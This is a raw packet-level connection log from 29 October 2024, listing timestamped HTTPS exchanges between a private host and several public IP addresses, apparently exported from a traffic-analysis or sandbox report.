                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.885925055 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.886269093 CET44349731192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.886315107 CET44349731192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.886343956 CET44349731192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.886373043 CET44349731192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.886383057 CET49731443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.886399984 CET44349731192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.886415958 CET49731443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.886459112 CET44349731192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.886512995 CET49731443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.887262106 CET49726443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.887276888 CET44349726192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.889280081 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.889293909 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.890043974 CET49731443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.890049934 CET44349731192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.890187025 CET44349734192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.890198946 CET44349727192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.890223980 CET44349732192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.890273094 CET44349727192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.890352964 CET49727443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.890748978 CET49734443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.890758038 CET44349734192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.891107082 CET49732443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.891118050 CET44349732192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.891259909 CET44349734192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.891343117 CET44349735192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.891604900 CET49734443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.891706944 CET44349734192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.891774893 CET49735443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.891782999 CET44349735192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.891915083 CET49734443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.892088890 CET44349736192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.892091036 CET44349738192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.892333031 CET49738443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.892402887 CET44349738192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.892455101 CET44349732192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.892460108 CET49736443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.892482042 CET44349736192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.892518997 CET49732443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.892823935 CET44349735192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.892842054 CET49732443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.892893076 CET49735443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.892918110 CET44349732192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.893218994 CET49732443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.893225908 CET44349732192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.893501043 CET44349738192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.893559933 CET44349736192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.893589973 CET49738443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.893624067 CET49736443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.894107103 CET49727443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.894115925 CET44349727192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.894407988 CET49735443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.894476891 CET49738443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.894490957 CET44349735192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.894562960 CET49736443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.894603968 CET44349738192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.894653082 CET44349736192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.894738913 CET44349733192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.894773960 CET49735443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.894778967 CET44349735192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.894824982 CET49738443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.894843102 CET44349738192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.894902945 CET49736443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.894915104 CET44349736192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.895045996 CET49733443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.895072937 CET44349733192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.895262957 CET44349737192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.895417929 CET44349733192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.895499945 CET49737443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.895523071 CET44349737192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.895740986 CET49733443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.895802021 CET44349733192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.895839930 CET49733443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.896567106 CET44349737192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.896650076 CET49737443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.897123098 CET49737443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.897190094 CET44349737192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.897337914 CET49737443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.897347927 CET44349737192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.905891895 CET49740443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.905983925 CET44349740192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.906102896 CET49740443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.906729937 CET49740443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.906761885 CET44349740192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.939336061 CET44349734192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.939347982 CET44349733192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.939846039 CET49732443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.939893007 CET49736443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.947405100 CET49733443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.947408915 CET49735443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.947509050 CET49737443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.947696924 CET49738443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.020838976 CET44349734192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.020908117 CET44349734192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.020936966 CET44349734192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.020984888 CET49734443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.020997047 CET44349734192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.021050930 CET49734443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.021092892 CET44349734192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.021161079 CET44349734192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.021204948 CET49734443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.021220922 CET44349732192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.021238089 CET44349738192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.021310091 CET44349738192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.021372080 CET44349732192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.021373034 CET49738443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.021425962 CET49732443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.021442890 CET44349732192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.021516085 CET44349735192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.021527052 CET44349732192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.021567106 CET49732443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.021576881 CET44349732192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.021588087 CET44349735192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.021631956 CET49735443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.021678925 CET44349732192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.021728992 CET49732443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.021737099 CET44349732192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.021821976 CET44349732192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.021866083 CET49732443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.021873951 CET44349732192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.022037029 CET49734443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.022047997 CET44349734192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.022099018 CET44349732192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.022140980 CET49732443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.022150993 CET44349732192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.022229910 CET44349732192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.022274017 CET49732443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.022830963 CET44349736192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.022999048 CET44349736192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.023056984 CET49736443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.023848057 CET49738443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.023863077 CET44349738192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.024182081 CET49735443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.024205923 CET44349735192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.024449110 CET49732443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.024467945 CET44349732192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.025384903 CET49736443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.025397062 CET44349736192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.026288986 CET44349733192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.026350021 CET44349733192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.026386023 CET44349733192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.026395082 CET49733443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.026410103 CET44349733192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.026452065 CET44349733192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.026456118 CET49733443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.026463032 CET44349733192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.026504040 CET49733443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.026510000 CET44349733192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.027246952 CET44349733192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.027304888 CET49733443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.027311087 CET44349733192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.028311014 CET44349737192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.028573990 CET44349737192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.028635979 CET49737443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.029531956 CET49737443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.029546976 CET44349737192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.038422108 CET49741443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.038461924 CET44349741192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.038542986 CET49741443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.038547039 CET49742443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.038594007 CET44349742192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.038646936 CET49742443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.038683891 CET49743443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.038698912 CET44349743192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.038747072 CET49743443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.038800955 CET49744443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.038831949 CET44349744192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.038897038 CET49744443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.039053917 CET49741443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.039067030 CET44349741192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.039197922 CET49742443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.039211988 CET44349742192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.039376020 CET49743443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.039386034 CET44349743192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.039505005 CET49744443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.039520025 CET44349744192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.075611115 CET49733443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.141545057 CET44349733192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.145505905 CET44349733192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.145684004 CET44349733192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.145718098 CET44349733192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.145719051 CET49733443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.145762920 CET44349733192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.145781994 CET49733443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.145811081 CET44349733192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.145853996 CET49733443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.145864010 CET44349733192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.145898104 CET44349733192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.145945072 CET49733443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.146085024 CET49733443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.146104097 CET44349733192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.149728060 CET49745443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.149780989 CET44349745192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.149856091 CET49745443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.150067091 CET49745443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.150079966 CET44349745192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.152148962 CET49746443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.152178049 CET44349746192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.152255058 CET49746443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.152992010 CET49746443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.153002977 CET44349746192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.153496027 CET49747443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.153506041 CET44349747192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.153587103 CET49747443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.153768063 CET49747443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.153774023 CET44349747192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.158746004 CET49700443192.168.2.16192.0.78.12
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.159529924 CET49748443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.159558058 CET44349748192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.159624100 CET49748443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.159969091 CET49748443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.159981012 CET44349748192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.203334093 CET44349700192.0.78.12192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.254666090 CET49749443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.254690886 CET44349749142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.254766941 CET49749443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.254954100 CET49749443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.254961014 CET44349749142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.286989927 CET44349700192.0.78.12192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.287395000 CET44349700192.0.78.12192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.287457943 CET49700443192.168.2.16192.0.78.12
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.287740946 CET49700443192.168.2.16192.0.78.12
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.287760973 CET44349700192.0.78.12192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.537170887 CET44349740192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.537451029 CET49740443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.537462950 CET44349740192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.537816048 CET44349740192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.538130045 CET49740443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.538197041 CET44349740192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.538281918 CET49740443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.579335928 CET44349740192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.647089958 CET44349742192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.647089005 CET44349744192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.647346020 CET44349743192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.647367954 CET49744443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.647388935 CET44349744192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.647485018 CET49742443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.647496939 CET44349742192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.647571087 CET49743443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.647586107 CET44349743192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.648433924 CET44349744192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.648514986 CET49744443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.648523092 CET44349742192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.648590088 CET49742443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.648618937 CET44349743192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.648680925 CET49743443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.648773909 CET49744443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.648833990 CET44349744192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.649039984 CET49742443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.649096966 CET44349742192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.649259090 CET49743443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.649321079 CET44349743192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.649430037 CET49744443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.649436951 CET44349744192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.649476051 CET49742443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.649482012 CET44349742192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.649511099 CET49743443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.649519920 CET44349743192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.656680107 CET44349741192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.657007933 CET49741443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.657025099 CET44349741192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.658073902 CET44349741192.0.76.3192.168.2.16
